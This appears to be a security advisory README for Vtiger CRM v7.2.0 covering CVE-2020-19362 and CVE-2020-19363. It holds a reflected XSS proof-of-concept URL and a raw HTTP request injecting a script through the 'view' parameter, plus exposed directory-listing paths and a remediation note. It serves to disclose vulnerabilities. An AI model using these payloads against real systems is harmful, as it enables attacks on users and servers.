Vtiger-CRM-Vulnerabilities

Vtiger CRM v7.2.0 has Cross-Site Scripting (XSS) and directory listing vulnerabilities.

CVE-2020-19362 - CVE-2020-19363

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-19362

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-19363

Vtiger CRM Reflected XSS Vulnerability

Reflected XSS in the Vtiger CRM v7.2.0 can result in an attacker performing malicious actions to users who open a maliciously crafted link or third-party web page.

PoC

To exploit vulnerability, someone could use a GET request to 'http://[server]//vtigercrm/index.php?app=&module=Campaigns&view=%3Ctest%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E' by manipulating 'view' parameter in the request header to impact users who open a maliciously crafted link or third-party web page.

GET /vtigercrm/index.php?app=&module=Campaigns&view=%3Ctest%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E HTTP/1.1
Host: 172.16.155.128
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=nc32t8env2h236vf3s6ftor3im
Upgrade-Insecure-Requests: 1

Vtiger CRM Directory Listing Vulnerabilities

PoC

http://[server]/vtigercrm/libraries/
http://[server]/vtigercrm/layouts/

Remediation

You should make sure the directory does not contain sensitive information or you may want to restrict directory listings from the web server configuration.